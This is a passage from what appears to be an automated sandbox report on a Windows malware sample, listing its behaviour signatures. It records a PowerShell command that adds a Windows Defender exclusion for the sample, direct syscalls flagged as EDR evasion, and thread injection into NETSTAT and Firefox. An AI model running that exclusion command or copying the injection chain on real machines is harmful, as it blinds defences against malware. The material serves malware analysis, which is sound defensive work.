            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B2B57 mov eax, dword ptr fs:[00000030h]4_2_016B2B57
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B2B57 mov eax, dword ptr fs:[00000030h]4_2_016B2B57
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B2B57 mov eax, dword ptr fs:[00000030h]4_2_016B2B57
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B2B57 mov eax, dword ptr fs:[00000030h]4_2_016B2B57
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160EB20 mov eax, dword ptr fs:[00000030h]4_2_0160EB20
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160EB20 mov eax, dword ptr fs:[00000030h]4_2_0160EB20
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A8B28 mov eax, dword ptr fs:[00000030h]4_2_016A8B28
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A8B28 mov eax, dword ptr fs:[00000030h]4_2_016A8B28
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4B00 mov eax, dword ptr fs:[00000030h]4_2_016B4B00
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165EB1D mov eax, dword ptr fs:[00000030h]4_2_0165EB1D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165EB1D mov eax, dword ptr fs:[00000030h]4_2_0165EB1D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165EB1D mov eax, dword ptr fs:[00000030h]4_2_0165EB1D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165EB1D mov eax, dword ptr fs:[00000030h]4_2_0165EB1D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165EB1D mov eax, dword ptr fs:[00000030h]4_2_0165EB1D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165EB1D mov eax, dword ptr fs:[00000030h]4_2_0165EB1D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165EB1D mov eax, dword ptr fs:[00000030h]4_2_0165EB1D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165EB1D mov eax, dword ptr fs:[00000030h]4_2_0165EB1D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165EB1D mov eax, dword ptr fs:[00000030h]4_2_0165EB1D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E0BCD mov eax, dword ptr fs:[00000030h]4_2_015E0BCD
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E0BCD mov eax, dword ptr fs:[00000030h]4_2_015E0BCD
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E0BCD mov eax, dword ptr fs:[00000030h]4_2_015E0BCD
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166CBF0 mov eax, dword ptr fs:[00000030h]4_2_0166CBF0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160EBFC mov eax, dword ptr fs:[00000030h]4_2_0160EBFC
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01600BCB mov eax, dword ptr fs:[00000030h]4_2_01600BCB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01600BCB mov eax, dword ptr fs:[00000030h]4_2_01600BCB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01600BCB mov eax, dword ptr fs:[00000030h]4_2_01600BCB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E8BF0 mov eax, dword ptr fs:[00000030h]4_2_015E8BF0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E8BF0 mov eax, dword ptr fs:[00000030h]4_2_015E8BF0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E8BF0 mov eax, dword ptr fs:[00000030h]4_2_015E8BF0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168EBD0 mov eax, dword ptr fs:[00000030h]4_2_0168EBD0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01694BB0 mov eax, dword ptr fs:[00000030h]4_2_01694BB0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01694BB0 mov eax, dword ptr fs:[00000030h]4_2_01694BB0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0BBE mov eax, dword ptr fs:[00000030h]4_2_015F0BBE
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0BBE mov eax, dword ptr fs:[00000030h]4_2_015F0BBE
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0A5B mov eax, dword ptr fs:[00000030h]4_2_015F0A5B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0A5B mov eax, dword ptr fs:[00000030h]4_2_015F0A5B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168EA60 mov eax, dword ptr fs:[00000030h]4_2_0168EA60
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161CA6F mov eax, dword ptr fs:[00000030h]4_2_0161CA6F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161CA6F mov eax, dword ptr fs:[00000030h]4_2_0161CA6F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161CA6F mov eax, dword ptr fs:[00000030h]4_2_0161CA6F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E6A50 mov eax, dword ptr fs:[00000030h]4_2_015E6A50
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E6A50 mov eax, dword ptr fs:[00000030h]4_2_015E6A50
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E6A50 mov eax, dword ptr fs:[00000030h]4_2_015E6A50
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E6A50 mov eax, dword ptr fs:[00000030h]4_2_015E6A50
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E6A50 mov eax, dword ptr fs:[00000030h]4_2_015E6A50
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E6A50 mov eax, dword ptr fs:[00000030h]4_2_015E6A50
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E6A50 mov eax, dword ptr fs:[00000030h]4_2_015E6A50
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165CA72 mov eax, dword ptr fs:[00000030h]4_2_0165CA72
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165CA72 mov eax, dword ptr fs:[00000030h]4_2_0165CA72
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161CA24 mov eax, dword ptr fs:[00000030h]4_2_0161CA24
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160EA2E mov eax, dword ptr fs:[00000030h]4_2_0160EA2E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01604A35 mov eax, dword ptr fs:[00000030h]4_2_01604A35
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01604A35 mov eax, dword ptr fs:[00000030h]4_2_01604A35
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161CA38 mov eax, dword ptr fs:[00000030h]4_2_0161CA38
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166CA11 mov eax, dword ptr fs:[00000030h]4_2_0166CA11
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E0AD0 mov eax, dword ptr fs:[00000030h]4_2_015E0AD0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161AAEE mov eax, dword ptr fs:[00000030h]4_2_0161AAEE
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161AAEE mov eax, dword ptr fs:[00000030h]4_2_0161AAEE
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01636ACC mov eax, dword ptr fs:[00000030h]4_2_01636ACC
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01636ACC mov eax, dword ptr fs:[00000030h]4_2_01636ACC
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01636ACC mov eax, dword ptr fs:[00000030h]4_2_01636ACC
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01614AD0 mov eax, dword ptr fs:[00000030h]4_2_01614AD0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01614AD0 mov eax, dword ptr fs:[00000030h]4_2_01614AD0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01636AA4 mov eax, dword ptr fs:[00000030h]4_2_01636AA4
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EEA80 mov eax, dword ptr fs:[00000030h]4_2_015EEA80
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EEA80 mov eax, dword ptr fs:[00000030h]4_2_015EEA80
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe"
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: NULL target: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 7984Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\NETSTAT.EXEThread APC queued: target process: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess created: C:\Users\user\Desktop\NU1aAbSmCr.exe "C:\Users\user\Desktop\NU1aAbSmCr.exe"Jump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2580134627.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000000.1747506506.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1888263847.0000000000BF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2580134627.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000000.1747506506.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1888263847.0000000000BF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2580134627.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000000.1747506506.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1888263847.0000000000BF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2580134627.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000000.1747506506.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1888263847.0000000000BF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeQueries volume information: C:\Users\user\Desktop\NU1aAbSmCr.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
